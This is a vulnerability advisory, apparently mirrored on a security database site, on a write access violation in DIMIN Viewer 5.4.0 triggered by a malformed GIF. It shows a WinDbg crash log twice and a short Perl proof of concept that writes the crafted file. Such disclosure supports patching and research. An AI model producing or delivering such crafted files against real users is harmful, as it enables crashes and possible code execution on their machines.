Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28855
HistoryDec 11, 2012 - 12:00 a.m.

DIMIN Viewer 5.4.0 <= WriteAV Arbitrary Code Execution

2012-12-1100:00:00
vulners.com
18
JSON

#!/usr/bin/perl

DIMIN Viewer 5.4.0 <= WriteAV Arbitrary Code Execution

Author: Jean Pascal Pereira <[email protected]>

Vendor URI: http://www.dimin.net

Vendor Decription:

View images in countless formats, and apply a variety of effects with this small, fast, and powerful

application. Dimin Viewer incorporates unique visualization ideas, like Panoramic Photographs Tool

and Big Image Navigator. It also features multi language interface to feel yourself at home!

Debug info:

Microsoft (R) Windows Debugger Version 6.11.0001.404 X86

Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: "C:\Program Files\DIMIN\Viewer5\imgview5.exe" C:\research\Viewer5\crafted.gif

Symbol search path is: *** Invalid***

****************************************************************************

* Symbol loading may be unreliable without a symbol search path. *

* Use .symfix to have the debugger choose a symbol path. *

* After setting your symbol path, use .reload to refresh symbol locations. *

****************************************************************************

Executable search path is:

ModLoad: 00400000 006bb000 image00400000

ModLoad: 7c900000 7c9b2000 ntdll.dll

ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll

ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\advapi32.dll

ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll

ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll

ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll

ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll

ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll

ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll

ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll

ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\comdlg32.dll

ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll

ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll

ModLoad: 77120000 771ab000 C:\WINDOWS\system32\oleaut32.dll

ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll

ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\winmm.dll

ModLoad: 73000000 73026000 C:\WINDOWS\system32\winspool.drv

(fdc.b98): Break instruction exception - code 80000003 (first chance)

ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL

ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll

ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll

ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime

ModLoad: 00e50000 00ef7000 C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_dcraw.dll

ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll

ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll

ModLoad: 00f20000 0102f000 C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll

ModLoad: 01050000 0106a000 C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_morphology.dll

ModLoad: 01090000 010ba000 C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_xtdFilters.dll

(fdc.b98): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0

eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206

*** WARNING: Unable to verify checksum for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll

*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll -

div5_xtd_formats!divGetFilter+0x80c8b:

00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=???

0:000> r;!exploitable -v;q

eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0

eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206

div5_xtd_formats!divGetFilter+0x80c8b:

00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=???

HostMachine\HostUser

Executing Processor Architecture is x86

Debuggee is in User Mode

Debuggee is a live user mode debugging session on the local machine

Event Type: Exception

*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -

Exception Faulting Address: 0x1471000

First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)

Exception Sub-Type: Write Access Violation

Exception Hash (Major/Minor): 0x550b2f71.0x55423571

Stack Trace:

div5_xtd_formats!divGetFilter+0x80c8b

div5_xtd_formats!divGetFilter+0x80d0a

div5_xtd_formats+0xc821

div5_xtd_formats+0xcc07

Instruction Address: 0x0000000000fb1a7b

Microsoft (R) Windows Debugger Version 6.11.0001.404 X86

Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: "C:\Program Files\DIMIN\Viewer5\imgview5.exe" C:\research\Viewer5\crafted.gif

Symbol search path is: *** Invalid***

****************************************************************************

* Symbol loading may be unreliable without a symbol search path. *

* Use .symfix to have the debugger choose a symbol path. *

* After setting your symbol path, use .reload to refresh symbol locations. *

****************************************************************************

Executable search path is:

ModLoad: 00400000 006bb000 image00400000

ModLoad: 7c900000 7c9b2000 ntdll.dll

ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll

ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\advapi32.dll

ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll

ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll

ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll

ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll

ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll

ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll

ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll

ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\comdlg32.dll

ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll

ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll

ModLoad: 77120000 771ab000 C:\WINDOWS\system32\oleaut32.dll

ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll

ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\winmm.dll

ModLoad: 73000000 73026000 C:\WINDOWS\system32\winspool.drv

(fdc.b98): Break instruction exception - code 80000003 (first chance)

ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL

ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll

ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll

ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime

ModLoad: 00e50000 00ef7000 C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_dcraw.dll

ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll

ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll

ModLoad: 00f20000 0102f000 C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll

ModLoad: 01050000 0106a000 C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_morphology.dll

ModLoad: 01090000 010ba000 C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_xtdFilters.dll

(fdc.b98): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0

eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206

*** WARNING: Unable to verify checksum for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll

*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll -

div5_xtd_formats!divGetFilter+0x80c8b:

00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=???

0:000> r;!exploitable -v;q

eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0

eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206

div5_xtd_formats!divGetFilter+0x80c8b:

00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=???

HostMachine\HostUser

Executing Processor Architecture is x86

Debuggee is in User Mode

Debuggee is a live user mode debugging session on the local machine

Event Type: Exception

*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -

Exception Faulting Address: 0x1471000

First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)

Exception Sub-Type: Write Access Violation

Exception Hash (Major/Minor): 0x550b2f71.0x55423571

Stack Trace:

div5_xtd_formats!divGetFilter+0x80c8b

div5_xtd_formats!divGetFilter+0x80d0a

div5_xtd_formats+0xc821

div5_xtd_formats+0xcc07

Instruction Address: 0x0000000000fb1a7b

Proof of Concept:

my $crafted = "\x47\x49\x46\x38\x39\x61\x30\x00\x2C\x00\xB3\x00\x00\x00\x00\x00".
"\x80\x00\x00\x00\x80\x00\x80\x80\x00\x00\x00\x80\x80\x00\x80\x00".
"\x80\x80\x80\x80\x80\xC0\xC0\xC0\xFF\x00\x00\x00\xFF\x00\xFF\xFF".
"\x00\x00\x00\xFF\xFF\x00\xFF\x00\xFF\xFF\xFF\xFF\xFF\x21\xF9\x04".
"\x01\x00\x00\x0F\x00\x2C\x00\x00\x00\x00\x30\x00\x2C\x00\x00\xFE".
"\x04\xF0";

open(C, ">:raw", "crafted.gif");
print C $crafted;
close(C);

http://0xffe4.org

JSON